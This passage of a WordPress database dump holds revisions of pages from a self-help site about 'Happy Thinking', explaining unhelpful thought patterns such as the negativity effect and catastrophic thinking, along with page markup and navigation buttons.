do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Of course, once you recognise unhelpful thinking, you will want to change such thinking. To help you with this, I will describe various methods that you can use to change unhelpful thinking. These methods are very practical and you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to helping you to recognise and change unhelpful thinking, I will also share with you bits of wisdom about happiness that I have collected from various places. Wisdom can help one to see the world with a different and happier viewpoint. All these ingredients together make Happy Thinking, which will help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the next pages (i.e. first part of this website), I will explain to you in an easy-to-understand way, common types of unhelpful thinking that people do. As you learn about the common types of unhelpful thinking, see which ones apply to you and feel free to skim over the ones that seem to be not relevant to you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1883,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/patternrecognition170623a.gif" alt="" class="wp-image-1883"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Please note that in the first section of this website, I will not mention any of the methods that you can use to deal with unhelpful thinking. Those I will share with you after you understand the various types of unhelpful thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finally do not try to understand and remember every type of unhelpful thinking in one go. A lot of people think that by speed reading and clicking through pages, they would miraculously end up becoming happier. Unfortunately, by going too fast, the information will just bounce off oneâ€™s mind, rather than interacting with it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2041,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/shape_bounce_21_7_23.jpg" alt="" class="wp-image-2041"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Like lots of things, you need to go slow so that you can appreciate and digest knowledge. This website will always be there for you, so take as long as you like to read it. You are always welcome to keep visiting here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Letâ€™s move on to understand common types of unhelpful thinking. Letâ€™s see how many will be relevant to you! In my case, I could recognise many of them in my own mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'publish', 'closed', 'closed', '', 'introduction', '', '', '2024-01-10 14:22:08', '2024-01-10 14:22:08', '', 0, 'https://www.stopstupidthinking.com/?page_id=1034', 0, 'page', '', 0);
INSERT INTO `wpou_posts` VALUES
(1784, 1, '2023-06-10 21:18:13', '2023-06-10 21:18:13', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1783,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cloudsea_100323D.jpg" alt="" class="wp-image-1783"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. To reflect this approach, I have divided this website about Happy Thinking into two main parts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy-to-understand way, common types of negative thinking. This part will help you to recognise such thinking when it happens in your mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various mental techniques that your mind can use to either change negative thinking or help prevent such thinking from affecting you in an adverse way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I like to think of such techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with negative thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make you into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-10 21:18:13', '2023-06-10 21:18:13', '', 1034, 'https://www.happythinking.com/?p=1784', 0, 'revision', '', 0),
(1544, 1, '2023-04-10 12:20:54', '2023-04-10 12:20:54', '<!-- wp:paragraph -->\n<p>Letâ€™s start by discussing a common type of stupid thinking that oneâ€™s brain may do, which psychologists call the â€œnegativity effectâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In your life, you have positive experiences (e.g. getting a promotion at work) and negative experiences (e.g. losing an expensive phone). Unfortunately, your brain can have the tendency of giving excessive importance to negative experiences while mostly ignoring positive experiences. This increased focus on negative experiences can make you unnecessarily feel that things are worse than they really are. This of course makes no sense as there is no reason that one should just focus on negative experiences. Rather, one should look at both, positive and negative experiences, to get a balanced view.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Psychologists have named this stupid thinking, where oneâ€™s brain exaggerates negative experiences, the â€œnegativity effectâ€. It is quite an important one to be wary of, as if it happens too often, it can lead to one having a low mood or even depression.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"id":565,"sizeSlug":"large","linkDestination":"none","className":"pras_border"} -->\n<figure class="wp-block-image size-large pras_border"><img src="https://www.happythinking.com/wp-content/uploads/2020/11/heavy_negative_061120-1024x576.gif" alt="" class="wp-image-565"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>The example below shows how the negativity effect can be harmful.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"opacity":"css","className":"aligncenter is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity aligncenter is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Joe works in a financial company and was asked to give four important presentations at a company meeting. Joe worked really hard on his presentations and was well prepared.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the day, he gave four excellent presentations. They were well written, delivered clearly and had nice clear diagrams. Each presentation was followed by a question and answer session. During the first three presentations, Joe answered all the questions perfectly. However, at the last presentation, he made a small mistake when answering one of the questions and this made some of the members of the audience laugh. Nevertheless, at the end of the day, everyone applauded Joe for his truly excellent presentations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite the presentations going well, when Joe returned to his home later that day, he became very depressed. All that he thought about was that one question he had answered wrongly. His brain was ignoring all the positive experiences of the day where he had made excellent presentations and had answered all questions except one, perfectly. That one negative episode overshadowed the otherwise perfect day, making Joe unnecessarily feel depressed. In reality, instead of being depressed, he should have been overjoyed by the overall good performance he had done on the day.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>In your life, to prevent unnecessary distress, it is important to check if your brain is only focusing only on the negative experiences in your life. Try to give importance to both positive and negative experiences in a balanced way, instead of only seeing the negative aspects. You should feel good about the positive experiences and learn from the negative experiences.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1346} /-->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-04-10 12:20:54', '2023-04-10 12:20:54', '', 1034, 'https://www.happythinking.com/?p=1544', 0, 'revision', '', 0),
(2049, 1, '2023-08-06 15:54:20', '2023-08-06 15:54:20', '<!-- wp:paragraph -->\n<p>In our day-to-day lives, we all keep an eye out for things that may harm us. This assessment of the world around us for danger is essential for oneâ€™s â€œsurvivalâ€ and is built into our brains. Unfortunately, this system for assessing dangers can work in an exaggerated way in some people, leading to unhelpful thinking patterns happening in their minds. I will now explain one such unhelpful thinking pattern which psychologists call â€œcatastrophic thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let me use an example to explain â€œcatastrophic thinkingâ€. Imagine that a person has a teenage daughter and that she is fifteen minutes beyond the time she usually arrives home from school. While many parents will start to be concerned when their child is late returning from school, a parent with catastrophic thinking will straight away think of only the worst possible outcome. For example, a parent with catastrophic thinking may immediately think, â€œOh no, my daughter must have met with a road traffic accident and may be bleeding to death at this very moment.â€ whereas, a parent without such thinking may think instead, â€œMaybe there is very heavy traffic on the roads, and the school bus may have got held up.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In fact, with catastrophic thinking, the person may add further layers of â€œworst outcomeâ€ scenarios. Continuing from the example I just gave, the further added scenarios may go like this, â€œAnd with the loss of my daughter, I would become extremely depressed, making me lose my partner and job. I will end up being homeless and sleeping on the streetâ€. With such a catastrophic imagination, the person will undergo immense unnecessary stress, probably further compromising the person''s ability to think rationally. And all this stress happens without the person having any idea of what actually has happened.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This is not to say that one should not be concerned about oneâ€™s children. Rather, it''s about having a measured level of concern. In the example, perhaps instead of imagining the worst, a better approach would have been to say look up online to see for traffic reports in the area etc.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A common theme that you will see when I discuss unhelpful thinking patterns is that it often has to do with one not â€œseeing things the way they really areâ€. What I mean is that our minds often â€œimagineâ€ an outcome and then treat that imagination as being true. i.e. it confuses imagination and truth. In the example given before, yes there was a reason for the person to be concerned that his or her daughter was late, but then the thinking became unhelpful when the person''s mind imagined that an accident must have happened, when in reality, at that point there was no evidence that anything bad had happened. An important part of happy thinking is about developing the ability to see things the way they are, rather than having an imaginary view. In the â€œtoolsâ€ section of this website I will give you some techniques to help you do this.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/all-or-nothing-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Catastrophic thinking', '', 'inherit', 'closed', 'closed', '', '1620-revision-v1', '', '', '2023-08-06 15:54:20', '2023-08-06 15:54:20', '', 1620, 'https://www.happythinking.com/?p=2049', 0, 'revision', '', 0),
(2024, 1, '2023-07-18 08:59:07', '2023-07-18 08:59:07', '<!-- wp:paragraph -->\n<p>In our day-to-day lives, we all keep an eye out for things that may harm us. This assessment of the world around us for danger is essential for oneâ€™s â€œsurvivalâ€ and is built into our brains. It is probably something that has carried over from the time of our distant ancestors, who in their forest environment, would have had to keep a keen eye for lurking dangers such as poisonous snakes and tigers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, this system for assessing dangers can work in an exaggerated way in some people, leading to negative thinking patterns in them. I will now explain one such negative thinking pattern which psychologists call â€œcatastrophic thinkingâ€. Let me use an example to explain it. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Imagine that a person has a teenage daughter and that she is fifteen minutes beyond the time she usually arrives home from school. While many parents will start to be concerned when their child is late returning from school, a parent with catastrophic thinking will straight away think of only the worst possible outcome. For example, a parent with catastrophic thinking may immediately think, â€œOh no, my daughter must have met with a road traffic accident and may be bleeding to death at this very moment.â€ whereas, a parent without such thinking may think instead, â€œMaybe there is very heavy traffic on the roads, and the school bus may have got held up.â€ </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In fact, with catastrophic thinking, the person may add further layers of â€œworst outcomeâ€ scenarios. Continuing from the example I just gave, the further added scenarios may go like this, â€œAnd with the loss of my daughter, I would become extremely depressed, making me lose my partner and job. I will end up being homeless and sleeping on the streetâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>With such a catastrophic imagination, the person will undergo immense unnecessary stress, probably further compromising the person''s ability to think rationally. And all this stress happens without the person having any idea of what actually has happened (By the way, in our example, the daughter was indeed stuck in the bus, in heavy traffic!). This is not to say that one should not be concerned about oneâ€™s children. Rather, it''s about having a measured level of concern. In the example, perhaps instead of imagining the worst, a better approach would have been to say look up online to see for traffic reports in the area etc.Â Â Â Â </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A common theme that you will see when I discuss negative thinking patterns is that it often has to do with one not â€œseeing things the way they really areâ€. What I mean is that our brains often distort the true situation that is really present. In the example given before, yes there was a reason for the person to be concerned that his or her daughter was late, but then the thinking became negative when the person''s brain exaggerated the true risk. Without further information, there was no reason for the brain to imagine the worst outcomes. An important part of happy thinking is about developing the ability to see things the way they are, rather than having an imaginary view. &nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/all-or-nothing-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Catastrophic thinking', '', 'inherit', 'closed', 'closed', '', '1620-revision-v1', '', '', '2023-07-18 08:59:07', '2023-07-18 08:59:07', '', 1620, 'https://www.happythinking.com/?p=2024', 0, 'revision', '', 0),
(1598, 1, '2023-05-30 16:23:10', '2023-05-30 16:23:10', '<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/about_me/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"19px"} -->\n<div style="height:19px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"19px"} -->\n<div style="height:19px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'prev_next_home buttons', '', 'inherit', 'closed', 'closed', '', '1346-revision-v1', '', '', '2023-05-30 16:23:10', '2023-05-30 16:23:10', '', 1346, 'https://www.happythinking.com/?p=1598', 0, 'revision', '', 0),
(1592, 1, '2023-05-30 15:45:17', '2023-05-30 15:45:17', '<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/about_me/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"19px"} -->\n<div style="height:19px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center"} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->', 'prev_next_home buttons', '', 'inherit', 'closed', 'closed', '', '1346-revision-v1', '', '', '2023-05-30 15:45:17', '2023-05-30 15:45:17', '', 1346, 'https://www.happythinking.com/?p=1592', 0, 'revision', '', 0),
(1589, 1, '2023-05-30 15:17:25', '2023-05-30 15:17:25', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"align":"center","id":1578,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking300523.jpg" alt="" class="wp-image-1578"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Oneâ€™s mind plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain â€œunhelpfulâ€ ways of thinking that can negatively affect oneâ€™s mental wellbeing. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1581,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unhappyspiral300523.jpg" alt="" class="wp-image-1581"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On this website, I will describe to you, in an easy to understand way, various types of unhelpful thinking, so that you will be able to recognise such thinking when it happens in your mind. And very importantly, I will also give you practical ways to prevent such thinking from affecting you in a negative way. In essence, Happy Thinking is about not letting unhelpful ways of thinking get in the way of your happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1584,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/green_angel300523.jpg" alt="" class="wp-image-1584"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->', 'Change how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-05-30 15:17:25', '2023-05-30 15:17:25', '', 88, 'https://www.happythinking.com/?p=1589', 0, 'revision', '', 0),
(1746, 1, '2023-06-06 17:45:31', '2023-06-06 17:45:31', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"align":"center","id":1578,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking300523.jpg" alt="" class="wp-image-1578"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Oneâ€™s mind plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain negative ways of thinking that can negatively affect oneâ€™s mental well-being. On this website, I will describe to you, in an easy-to-understand way, various types of negative thinking, so that you will be able to recognise such thinking when it happens in your mind. And very importantly, I will also give you practical ways to change such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" 